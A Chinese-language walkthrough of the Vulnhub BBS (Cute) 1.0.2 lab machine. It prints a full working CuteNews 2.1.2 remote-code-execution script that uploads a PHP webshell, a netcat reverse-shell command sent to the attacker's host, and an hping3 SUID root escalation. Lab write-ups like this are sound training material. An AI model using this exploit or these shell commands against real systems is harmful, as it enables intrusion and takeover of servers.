Vulnhub 之BBS(Cute 1.0.2)靶机详细过程
BBS(Cute) 1.0.2
靶机名称:BBS (cute): 1.0.2
靶机地址:
https://www.vulnhub.com/entry/bbs-cute-102,567/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.159.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:7d:6d:47 1 60 PCS Systemtechnik GmbH
192.168.56.182 08:00:27:9f:a9:ca 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.182。
NMAP扫描
利用nmap工具对目标主机进行全端口扫描:
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.182 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 21:22 EST
Nmap scan report for bogon (192.168.56.182)
Host is up (0.00013s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) IMPLEMENTATION(Courier Mail Server) TOP UIDL PIPELINING STLS LOGIN-DELAY(10) USER
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: ERROR: Script execution failed (use -d to debug)
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) TOP IMPLEMENTATION(Courier Mail Server) UIDL LOGIN-DELAY(10) PIPELINING USER
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
MAC Address: 08:00:27:9F:A9:CA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.22 seconds
从NMAP扫描结果可以看到,该目标主机有5个开放端口22(SSH)、80(HTTP)、88(HTTP)、110(PoP3)以及995(SSL PoP3)
Get Access
由于目标主机的SSH服务没有可以利用的版本,因此需要从其他端口着手,HTTP服务可能涉及的信息以及漏洞会比较多,就从HTTP服务开始,HTTP服务涉及两个端口:访问80端口,返回Apache默认页面,检查一下是否有robots.txt文件
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ curl http://192.168.56.182/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.182 Port 80</address>
</body></html>
可知不存在robots.txt文件,那现在扫描一下有无可利用的目录:
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ gobuster dir -u http://192.168.56.182 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.182
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/16 21:27:16 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 301) [Size: 315] [--> http://192.168.56.182/docs/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.182/uploads/]
/skins (Status: 301) [Size: 316] [--> http://192.168.56.182/skins/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.182/core/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.182/manual/]
/libs (Status: 301) [Size: 315] [--> http://192.168.56.182/libs/]
/cdata (Status: 301) [Size: 316] [--> http://192.168.56.182/cdata/]
/server-status (Status: 403) [Size: 279]
Progress: 219446 / 220561 (99.49%)===============================================================
2022/11/16 21:27:42 Finished
===============================================================
虽然Gobuster扫描发现了一下目录,但是状态码都是301,也就是说有下一级的目录或者文件存在:
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ gobuster dir -u http://192.168.56.182 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.182
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/16 21:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/index.php (Status: 200) [Size: 6175]
/search.php (Status: 200) [Size: 5118]
/rss.php (Status: 200) [Size: 105]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.182/docs/]
/print.php (Status: 200) [Size: 28]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.182/uploads/]
/skins (Status: 301) [Size: 316] [--> http://192.168.56.182/skins/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.182/core/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.182/manual/]
/popup.php (Status: 200) [Size: 28]
/captcha.php (Status: 200) [Size: 92]
/LICENSE.txt (Status: 200) [Size: 3119]
/example.php (Status: 200) [Size: 9522]
/libs (Status: 301) [Size: 315] [--> http://192.168.56.182/libs/]
/snippet.php (Status: 200) [Size: 0]
/show_news.php (Status: 200) [Size: 2987]
/cdata (Status: 301) [Size: 316] [--> http://192.168.56.182/cdata/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/show_archives.php (Status: 200) [Size: 0]
Progress: 1101158 / 1102805 (99.85%)===============================================================
2022/11/16 21:33:47 Finished
===============================================================
这次Gobuster工具增加了文件的选项,这次扫描发现了不少不同的页面,尤其是/index.php是一个用户登录页面,而且给出了软件的版本:[CuteNews 2.1.2],本来想能不能有SQL注入漏洞或者绕开访问验证环节,anyway, 由于有软件的版本,看该版本有没有对应可以比较容易利用的漏洞:
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ searchsploit cutenews
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews - 'page' Local File Inclusion | php/webapps/15208.txt
CuteNews 0.88 - 'comments.php' Remote File Inclusion | php/webapps/22285.txt
CuteNews 0.88 - 'search.php' Remote File Inclusion | php/webapps/22284.txt
CuteNews 0.88 - 'shownews.php' Remote File Inclusion | php/webapps/22283.txt
CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting | php/webapps/24238.txt
CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting | php/webapps/24239.txt
CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting | php/webapps/24240.txt
CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting | php/webapps/24566.txt
CuteNews 1.1.1 - 'html.php' Remote Code Execution | php/webapps/4851.txt
CuteNews 1.3 - Comment HTML Injection | php/webapps/24290.txt
CuteNews 1.3 - Debug Query Information Disclosure | php/webapps/23406.txt
CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting | php/webapps/24372.txt
CuteNews 1.3.6 - 'result' Cross-Site Scripting | php/webapps/29217.txt
CuteNews 1.4.0 - Shell Injection / Remote Command Execution | php/webapps/1221.php
CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution | php/webapps/1400.pl
CuteNews 1.4.1 - 'function.php' Local File Inclusion | php/webapps/1612.php
CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/27819.txt
CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access | php/webapps/26465.txt
CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting | php/webapps/27252.txt
CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access | php/webapps/26466.txt
CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/27740.txt
CuteNews 1.4.1 - Shell Injection / Remote Command Execution | php/webapps/1289.php
CuteNews 1.4.5 - 'rss_title' Cross-Site Scripting | php/webapps/29159.txt
CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting | php/webapps/29158.txt
CuteNews 1.4.5 - Admin Password md5 Hash Fetching | php/webapps/4779.php
CuteNews 1.4.6 - 'from_date_day' Full Path Disclosure | php/webapps/33341.txt
CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation) | php/webapps/33344.txt
CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/33340.txt
CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution | php/webapps/7700.php
CuteNews 1.4.6 - 'result' Cross-Site Scripting | php/webapps/33343.txt
CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/33342.txt
CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass | php/webapps/33345.txt
CuteNews 2.0.3 - Arbitrary File Upload | php/webapps/37474.txt
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py
CuteNews aj-fork - 'path' Remote File Inclusion | php/webapps/32570.txt
CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion | php/webapps/2891.txt
CuteNews and UTF-8 CuteNews - Multiple Vulnerabilities | php/webapps/10002.txt
CutePHP CuteNews 1.3 - HTML Injection | php/webapps/22842.txt
CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection | php/webapps/25177.txt
CutePHP CuteNews 1.4.1 - 'index.php' Cross-Site Scripting | php/webapps/27356.txt
CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting | php/webapps/27676.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
发现了令人兴奋的查询结果,哈哈,看到有metasploit利用代码,但是在msfconsole中查询竟然没找到,因此重新在网上查找cuteNews 2.1.2的漏洞利用代码,发现了有Python代码,链接如下:
https://www.exploit-db.com/exploits/48800
└─$ cat exploit.py
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447
#! /bin/env python3
import requests
from base64 import b64decode
import io
import re
import string
import random
import sys
banner = """
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
global sess, ip
url = f"{ip}/CuteNews/cdata/users/lines"
encoded_creds = sess.get(url).text
buff = io.StringIO(encoded_creds)
chash = buff.readlines()
if "Not Found" in encoded_creds:
print ("[-] No hashes were found skipping!!!")
return
else:
for line in chash:
if "<?php die('Direct call - access denied'); ?>" not in line:
credentials = b64decode(line)
try:
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
print (sha_hash)
except:
pass
def register():
global sess, ip
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
postdata = {
"action" : "register",
"regusername" : userpass,
"regnickname" : userpass,
"regpassword" : userpass,
"confirm" : userpass,
"regemail" : f"{userpass}@hack.me"
}
register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
if 302 == register.status_code:
print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
else:
sys.exit()
def send_payload(payload):
global ip
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
print (f"signature_key: {signature_key}")
print (f"signature_dsi: {signature_dsi}")
print (f"logged in user: {logged_user}")
files = {
"mod" : (None, "main"),
"opt" : (None, "personal"),
"__signature_key" : (None, f"{signature_key}"),
"__signature_dsi" : (None, f"{signature_dsi}"),
"editpassword" : (None, ""),
"confirmpassword" : (None, ""),
"editnickname" : (None, logged_user),
"avatar_file" : (f"{logged_user}.php", payload),
"more[site]" : (None, ""),
"more[about]" : (None, "")
}
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
print("============================\nDropping to a SHELL\n============================")
while True:
print ()
command = input("command > ")
postdata = {"cmd" : command}
output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
if 404 == output.status_code:
print ("sorry i can't find your webshell try running the exploit again")
sys.exit()
else:
output = re.sub("GIF8;", "", output.text)
print (output.strip())
if __name__ == "__main__":
print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
extract_credentials()
print ("================================================================")
print()
print ("=============================\nRegistering a users\n=============================")
register()
print()
print("=======================================================\nSending Payload\n=======================================================")
send_payload(payload)
print ()
但是执行这个exploit代码,发现出错,不断尝试,最后发现需要将上面的代码中/CuteNews去掉,也就是为:
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ cat exploit_modified.py
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447
#! /bin/env python3
import requests
from base64 import b64decode
import io
import re
import string
import random
import sys
banner = """
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
global sess, ip
url = f"{ip}/cdata/users/lines"
encoded_creds = sess.get(url).text
buff = io.StringIO(encoded_creds)
chash = buff.readlines()
if "Not Found" in encoded_creds:
print ("[-] No hashes were found skipping!!!")
return
else:
for line in chash:
if "<?php die('Direct call - access denied'); ?>" not in line:
credentials = b64decode(line)
try:
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
print (sha_hash)
except:
pass
def register():
global sess, ip
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
postdata = {
"action" : "register",
"regusername" : userpass,
"regnickname" : userpass,
"regpassword" : userpass,
"confirm" : userpass,
"regemail" : f"{userpass}@hack.me"
}
register = sess.post(f"{ip}/index.php?register", data = postdata, allow_redirects = False)
if 302 == register.status_code:
print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
else:
sys.exit()
def send_payload(payload):
global ip
token = sess.get(f"{ip}/index.php?mod=main&opt=personal").text
signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
print (f"signature_key: {signature_key}")
print (f"signature_dsi: {signature_dsi}")
print (f"logged in user: {logged_user}")
files = {
"mod" : (None, "main"),
"opt" : (None, "personal"),
"__signature_key" : (None, f"{signature_key}"),
"__signature_dsi" : (None, f"{signature_dsi}"),
"editpassword" : (None, ""),
"confirmpassword" : (None, ""),
"editnickname" : (None, logged_user),
"avatar_file" : (f"{logged_user}.php", payload),
"more[site]" : (None, ""),
"more[about]" : (None, "")
}
payload_send = sess.post(f"{ip}/index.php", files = files).text
print("============================\nDropping to a SHELL\n============================")
while True:
print ()
command = input("command > ")
postdata = {"cmd" : command}
output = sess.post(f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
if 404 == output.status_code:
print ("sorry i can't find your webshell try running the exploit again")
sys.exit()
else:
output = re.sub("GIF8;", "", output.text)
print (output.strip())
if __name__ == "__main__":
print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
extract_credentials()
print ("================================================================")
print()
print ("=============================\nRegistering a users\n=============================")
register()
print()
print("=======================================================\nSending Payload\n=======================================================")
send_payload(payload)
print ()
也就是说需要将网上下载的漏洞利用代码里的url需要根据情况进行修改(而前面目录扫描的时候已经知道目录名称,需要将原来的exploit.py代码删除掉/CuteNews)
修改完成以后,执行该代码,得到可以执行命令的shell
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ python exploit_modified.py
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
[->] Usage python3 expoit.py
Enter the URL> http://192.168.56.182
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================
=============================
Registering a users
=============================
[+] Registration successful with username: ZrRZahiam0 and password: ZrRZahiam0
=======================================================
Sending Payload
=======================================================
signature_key: 91ab8a9e4310405881f0e7c9a0fb4c8c-ZrRZahiam0
signature_dsi: d6e1008e1aefde67a540b3303d26212d
logged in user: ZrRZahiam0
============================
Dropping to a SHELL
============================
command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
command >
这个shell看着不舒服,另外spawn一个shell出来:
command > nc -e /bin/bash 192.168.56.137 6666
这样在Kali Linux得到另外一个shell:
┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.182] 49586
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cute:/home/fox$ cat user.txt
cat user.txt
dcb8189a0eaf7a690a67785a7299be60
成功得到了User Flag!
提权
接下来就是设法提权,将Kali Linux上的linpeas.sh脚本上传至目标主机(可在Kali 启动python web服务,然后靶机通过wget工具下载该脚本),下载到靶机/tmp目录后,修改权限,并执行该脚本:
www-data@cute:/home/fox$ cd /tmp
cd /tmp
www-data@cute:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
--2022-11-17 04:01:43-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 808.42K --.-KB/s in 0.003s
2022-11-17 04:01:43 (235 MB/s) - 'linpeas.sh' saved [827827/827827]
www-data@cute:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@cute:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.19.0-10-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.132-1 (2020-07-24)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: cute.calipendula
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 23K Jan 15 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 154K Feb 2 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 154K Sep 6 2014 /usr/sbin/hping3
-rwsr-xr-x 1 root root 19K Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
www-data@cute:/tmp$ ls -alh /usr/sbin/hping3
ls -alh /usr/sbin/hping3
-rwsr-sr-x 1 root root 154K Sep 6 2014 /usr/sbin/hping3
www-data@cute:/tmp$
查询GTFOBINS网站给出提权的方法:
If the binary has the SUID bit set, it does not drop the elevated
privileges and may be abused to access the file system, escalate or
maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to
maintain elevated privileges. To interact with an existing SUID binary
skip the first command and run the program using its original path.
-
sudo install -m =xs $(which hping3) . ./hping3 /bin/sh -p
www-data@cute:/tmp$ /usr/sbin/hping3
/usr/sbin/hping3
hping3> /bin/sh -p
/bin/sh -p
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Sep 23 2020 .
drwxr-xr-x 18 root root 4.0K Sep 17 2020 ..
-rw------- 1 root root 70 Sep 23 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw------- 1 root root 36 Sep 17 2020 .lesshst
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 2 root root 4.0K Sep 17 2020 localweb
-rw------- 1 root root 33 Sep 18 2020 root.txt
# cat root.txt
cat root.txt
0b18032c2d06d9e738ede9bc24795ff2
#
成功提权,拿到root flag!!! 我们甚至都没有看其他端口,哈哈!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
